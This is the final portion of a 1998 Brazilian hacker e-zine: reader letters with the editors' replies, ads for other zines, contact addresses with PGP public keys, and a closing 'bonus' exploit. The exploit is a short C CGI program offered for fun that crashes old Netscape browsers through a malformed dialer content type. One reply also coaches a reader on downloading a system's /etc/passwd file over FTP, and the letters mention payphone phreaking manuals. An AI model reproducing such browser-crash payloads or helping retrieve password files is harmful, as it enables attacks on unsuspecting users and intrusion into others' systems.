Primeiro, parabéns pela Zine. 10. ....
   Eu queria saber uma coisa, qual o endereço do arquivo,
   especificadamente, que eu nao achei nada lah. E tb, como eu posso
   downloadar esse SO via NET se eu vi pra vender em dois CDs ?

RESPOSTA: Sim, o Linux eh vendido completo em CD, mas se vc nao quiser comprar
          o CD pode pegar de graa em varios endereos, eh soh procurar:
          http://www.sunsite.unc.edu
          ftp://ftp.cdrom.com/pub/linux

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

ae, eu sou um leitor de seu zine, que por sinal é otimo e gostaria de
   saber se vc tem endereços de mais zines

   valeu ae

   beakman

RESPOSTA: Na HP do PHR tem tudo q eh zine...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

A aí, bele? Cara eu tenho lido seu zine, achei 10 , mas tenho tido uns proble-
minhas quanto as dicas phreak. Posso me considerar um hacker de certa experi-
ência, mas nuca me interessei por phreak. Agora ví que também é muito loco.
Minha zica é com o lance dos cartões telefônicos. Não consegui fazer funcionar
nada daquilo que vc indicou. Segui os passos e não deu nada certo. Será que vc
pode dar um help?
  Valeu, meu nick é Cable Guy.

RESPOSTA: Poize, hehehe, aquelas merda nao funcionam mezmo... Mas pode crer
          cara, na proxima ediao (04 - Maro) vou colocar uma materia com
          as voltagens dos telefones a cartao, aguarde...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

olah...
como faco para conseguir as versoes anteriores do "Manual de
Violação a Telefones Públicos e Privados " ??????

obrigada

RESPOSTA: Vc soh digita no Cade? Vai aparecer, mas eu nao recomendo as versoes
          anteriores, a unica diferena sao correoes, e tem as mesmas coisas
          das mais novas, algumas a menos, se vc tem a mais nova nao precisa
          da mais velha, eh igual...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Cara,

Adorei o seu e-zine, e D +. Para mim que estou comecando agora (como vcs
dizem sou um begginer), e' otimo.
Mas voltando ao assunto do sbject, eu queria dar um toque em vcs: e sobre
os americanos.
Americanos somos todos nos que nascemos no continente chamado America. Os
bundoes que nascem no pais Estados Unidos, sao ESTADUNIENSES. Claro que,
eles tb sao americanos, mas nao tao quanto nos.
Eles sao tao arrogantes que se intitularam como donos da America ate no nome.

E cara, aproveitando a deixa, vc poderia me ajudar em uma coisa:
Eu chequei num arquivo passwd de 55k, mas nao consigo copia-lo. Eu do o
comando mas so chega o arquivo com 0k. como eu contorno isso?

REPOSTA: Humm, tens razao, os Americ... opz, os Estadunienses sao uns bundoes.
         Mas vc deve notar q quando falo Americanos, nao me refiro aos Sul-
         Americanos, e sim aos Norte-Americanos.
         Quanto ao seu problema de Download do passwd, eh o seguinte:
         Provavelmente vc usa o prog FTP do Linux ou do Win95. Acontece que
         quando vc dah o comando "get passwd" ele nao vai verificar se o ar-
         quivo existe ou nao e falar pra vc, ele soh vai tentar copiar dire-
         to, portanto se ele nao existir ele vem com 0k. O q deve ter de erra-
         do eh q vc nao estah digitando certo, ou estah digitando em MAIUSCU-
         LAS, um erro q nunca deve ser cometido no UNIX, ou simplesmente vc
         nao estah indo no diretorio correto, que seria /etc. Para conferir
         o dir. atual de um "pwd"...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

carai, manow... óia teu zine ta phods, arretado msmo... mas como p/ toda
regra existe uma excecao, tenho de comentar algumas coisas: mermao, p/ que
usa tantos sinais? sempre que faco o download e abro aparece com um monte
de caracteres especiais que sinceramente dificultam um pouco a leitura de
materias mais tecnicas... a área phreack tambem precisa ser rearranjada,
colocar mais material, coisas mais materias tecnicas a respeito da
telefonia brasileira e nao o carai da americana... a área anarchy, sem
comentarios, nao curto esse negocio de mini-terrorismo, mas nada contra...
a virii zone ta muito boa, o editor realmente merece os creditos... so uma
coisa: nos proximos numeros, jah que a revista eh direcionada à turma
iniciante, coloca algumas materias a respeito de interesse geral da galera,
tipo descricao das operacoes basicas de funcionamento de alguns programas,
como o pgp, por exemplo... ok manow? po vei, valew pela atencao e espero
que corra tudo bem por ai, manow...

OUTof|ORDER

RESPOSTA: Como eu ja disse, isso eh pro EDIT do MS-DOZ, nao pro MicroBost
          Word 8.0000 R$: soh 999,99. Sobre a telefonia Brasileira, tem uma
          box nessa ediao e na outra vai ter as voltagens dos telefones a
          cartao. Sobre o PGP, o Cebola vai fazer um tutorial pra proxima
          ediao...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Ola... estou mandando este E-MAIL para lhes pedir um favor...
Eu não poderei assesar Internet por um tempo apenas E-MAIL e gostaria de
saber se vcs. poderiam mandar os arquivos sobre PRHECK e as bovas edicoes
que viram a ser feitas do Hack and Phreak...
Obridado pela atenc~zao
maito:????@???????.???.??

   *As edicoes 0 e 1 eu ja tenho e dou-lhes os parabens por elas

RESPOSTA: Serio? Eu tmb nao vou poder, vc poderia autalizar minha HP, escre-
          ver materias pro zine, responder os mail, e se vc cozinha bem, po-
          deria fazer meu almoo? Acha q sou quem cara? Suporte tecnico da
          MicroSoft?

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

E aC ! Eu sou Rafael, um beginner, gostaria de saber como faGo para
   acessar o banco de dados do computador central de um pequeno provedor
   (para ter acesso as contas, poder alterA-las, abrir novas contas,
   etc...)
   Ficaria muito grato se vc me respondesse, o meu e-mail I:

RESPOSTAS: Hamm, proxima pergunta...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Eu achei demais a zine de vocês! Eu que sou um iniciante na area hacker e
   aumentei muito o meu conhecimento no assunto depois de ter lido as 3 zines
   já feitas, uma aprendizagem facil e, finalmente, alguem que respeita os
   iniciantes e faz uma oposiçao aos lamers...
   Vocês deveriam colocar mais assuntos hackers e continuar sem aquela trolha
   de comandos a baboseiras que as TRADICIONAIS costumam fazer.
   Gostaria de saber como se faz aquele cavalo de troia da zine dois...
   Eu gostaria de fazer algo pela zine mas eu sou um perdido na area hacker(
   como eu ja disse ainda estou caminhando...), mas tem o tema anarquia que eu
   nao entendo o que tem de anarquico nisso...Sei sobre a anarquia e outras
   cossitas mas....
   Valeu e continuem assim!

   PS: eu nao tenho qbasic, onde eu consigo e como se abre arquivos nele...Bem
   coisa de begginer...

   MORRAM LAMERS!

RESPOSTA: QUALQUER pergunta direcionada a programaao perguntem ao Cebola,
          mandem mails pra ele. cebola_br@hotmail.com

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Fala Mandrack!

   Gostei muito do zine, estou aprendendo muito com
   ele.
   Tambem gostaria de dizer que posso ajudar com a
   pagina do zine, qqr coisa é só falar, ok? =^)

   Tenho uma nova home page em
   http://www.theoffice.net/flaviosr mas ainda esta em
   construcao...

RESPOSTA: Muito legal mesmo saber q vcz aprendem e dao valor ao zine, ao con-
          trario de muitos q vivem do deboche. Se quiser ajudar com o HP, nos
          estamos precisando, entre em contato com a gente...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Ae galera do Hacker n' Pheaker..blz??
   Recebi esses Zines e adorei!
   São de mais!!
   Eu ja li muito Zine...mas muito mesmo!!
   E o Zine que achei mais legal ta sendo este!
   Principalmente a parte Virii...que esta sendo escrita pelo
   Cebola...
   Ele explica muito bem!1
   Valeu mesmo galera
   E vamo ver se num deixa esse Zine morrer como deixaram o Quebra de Sigilo
   morrer!!
   []s A todos e
   Fuuuiiiii

        Vulcano

RESPOSTA:   :)

   1998, HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                   11  -  ANUNCIOS, PUBLICAOES E MISC.
                  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Este eh um espao q a hackPHR abriu no zine para anuncios de outros zines
e anuncios diversos, como IRContros, BBSz, Home Pages, etc...
   E o melhor de tudo, eh gratis! Apenas mande um e-mail contendo o q vc quer
publicar, o nome, etc...

                               U H F   Z I N E

                             [unit hacker force]

             Visite a HP do UHF Zine, info, e um zine totalmente
             destinado aos newbies... Vale a pena conferir:

                             http://uhf.base.org

                      C Y C L O N E   H O M E   P A G E

      http://www.terravista.ciclone.com.br/areiasbrancas/1365/index.html

   1998, HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                     12  -  ENTRANDO EM CONTATO
                    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Se vc quiser comentar sobre uma materia ou alguma coisa assim, mande um
mail para o autor. Se vc nao sabe, no indice e no rodape de cada materia tem
o nome do autor q escreveu, para comentarios gerais sobre o zine, mande para
hacphr@hotmail.com. Use este apenas para comentarios, criticas, sugestoes, e
etc...

Para falar pessoalmente com a gente, ou para se candidatar a editor:

            MaNdRaCk: mandrack@geocities.com

            Cebola  : cebola_br@hotmail.com

   Se quiser usar o PGP:

   MaNdRaCk's PUBLIC KEY:

Type Bits/KeyID    Date       User ID
pub  1024/A236997D 1997/10/24 MaNdRaCk

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQCNAzRRBvsAAAEEANLxPF+C/i4WsgKCIctJJEIHRKbYlS3+Wl9Zr2+XWEnN4IeF
2bInC3BR+gMGKqVdzo3cWjvyyi/QnrzhR1HmTlkleNlPPbe/TMW1lYasBW66A9G/
vQoUgVCuCbLQUxdRmcNWnXEB6gRewVftCjfNfvXoI11XPopdqPcda8aiNpl9AAUR
tBtNYU5kUmFDayA8bWFuZHJhY2tAdXNhLm5ldD6JAJUDBRA0UQb79x1rxqI2mX0B
AfSwA/4/FAHPxuCSAdTY9Kdul6EKbaYf2tHDNd0NIpNqrjTiJ3oiVaPiQUR6eMlv
ei1CkNFbAe2tRgWIoucUyOjX6ZTijaB9Fd1mBbAuZStuArL9kSGXzkHoEJZYwyRU
dv6DY8s+0C3om3BoF05lVn/mcgnmdsMFs8d+EeXY/R0EzL4RZg==
=tkyG
-----END PGP PUBLIC KEY BLOCK-----

   Cebola's PUBLIC KEY:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2i

mQCNAzSgZvwAAAEEAM7Fl1R3Kd8sXY0eWm5H+0XKOBO3g6ifpFaz6G+EVW7jjeMO
hs9qW5Kco0bxHOAb8qfILAq3604MtnjiU/yCpk95ZbKjB7GonNeMQVwlhvdAIzyc
A+FvKBzLegWVUz2g3mEs3K1bq16HQFrg4h/w7wTbh8JYmDAh4g5foeaTuHMRAAUR
tC9GcmVkZXJpY28gV2FnbmVyIE8uIE1lbG8gPGxvcmVuemFAYmhuZXQuY29tLmJy
Pg==
=OV6h
-----END PGP PUBLIC KEY BLOCK-----

   1998, HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

               13  -  BRINDE: X-PLOIT P/ NETSCAPE E IE
              -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Aqui estah um exploit q existe no Netscape, a versao 4.0 do Netscape corrige
este bug, mas jah dah pra vc se divertir, hehehe

--cut here--

/*

 Mozilla Killer

 Detona todos os navegadores Netscape for Windows  v2.0-3.0.  Ele pode funcio-
 nar nas novas versoes 3.0 p/ Macintosh. Eh soh compilar a fonte e colocar um
 link pro cgi...

 */

#include

void
main (void)
{
  printf ("Content-type: application/x-netscape-autoconfigure-dialer\n\n");
  printf ("%c%c %c%c ", 237, 237, 237, 237);
}

--cut here--

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   1998, Fevereiro. Hack and Phreak Zine, QUALQUER copia de QUALQUER materia
   deste documento, deve constar as seguintes linhas:

   (nomedoautor)
   HackPHR Zine n. xx
   http://www.hackphr.home.ml.org

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=|FiM dO dOCuMeNtO|=-=-=-=-=-=-=-=-=-=-=-=-=-=-
